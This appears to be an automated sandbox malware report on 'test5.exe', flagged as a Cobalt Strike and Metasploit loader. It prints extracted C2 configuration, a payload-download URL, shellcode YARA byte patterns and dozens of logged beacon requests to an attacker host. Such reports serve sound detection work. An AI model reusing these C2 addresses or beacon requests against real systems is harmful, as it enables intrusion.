Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test5.exe

Overview

General Information

Sample name:test5.exe
Analysis ID:1581646
MD5:ac76c4a995accb8a1d272cb76c4374ee
SHA1:634fe41bf551c79cd1a3d9eb019da51d8c3803b5
SHA256:30f23855d09b242339d3bdd20fc72ac30569be14701fe6a3080b284a15eeacf0
Tags:CobaltStrikeexeuser-Disa_Tale
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to registers a callback to get notified when the system is suspended or resumed (often done by Miners)
Found Tor onion address
Potentially malicious time measurement code found
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • test5.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\test5.exe" MD5: AC76C4A995ACCB8A1D272CB76C4374EE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://7.90.135.102:443/2Vcr", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n"}
{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://47.90.135.102/2Vcr"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x40:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0xac:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        Click to see the 17 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T11:35:59.196677+010020287653Unknown Traffic192.168.2.44973147.90.135.102443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-28T11:35:59.929737+010020354421A Network Trojan was detected47.90.135.102443192.168.2.449731TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://7.90.135.102:443/2Vcr", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n"}
        Source: 00000000.00000002.2903666234.0000021551B00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)\r\n", "Type": "Metasploit Download", "URL": "http://47.90.135.102/2Vcr"}
        Source: test5.exeVirustotal: Detection: 6%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability

        Bitcoin Miner

        barindex
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_006B1040 LoadLibraryExW,0_2_006B1040
        Source: unknownHTTPS traffic detected: 47.90.135.102:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.34.5:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: test5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then test rbx, rbx0_2_00702160
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then shr r10, 0Dh0_2_006AA220
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then cmp rdx, 40h0_2_0069D620
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then cmp rdx, rbx0_2_0068BA60
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then lock or byte ptr [rdx], dil0_2_0069DD60
        Source: C:\Users\user\Desktop\test5.exeCode function: 4x nop then shr r10, 0Dh0_2_006A8D80

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 47.90.135.102:443 -> 192.168.2.4:49731
        Source: Malware configuration extractorURLs: http://7.90.135.102:443/2Vcr
        Source: Malware configuration extractorURLs: http://47.90.135.102/2Vcr
        Source: test5.exe, 00000000.00000000.1661554156.00000000007B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
        Source: test5.exeString found in binary or memory: m=nil base 390625uint16uint32uint64structchan<-<-chan ValueSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13netdnsdomaingophertelnetreturn.local.onionip+netrdtscppopcntX25519Commoncmd/goheaderAnswerLengthavx512rdrandrdseedfloat32float64CopySidFreeSidSleepExWSARecvWSASendconnectTrailersocks5hexpiresrefererrefreshGODEBUG:method:scheme:statushttp://consoleforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 47.90.135.102:443
        Source: global trafficHTTP traffic detected: GET /2Vcr HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)Host: 47.90.135.102Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
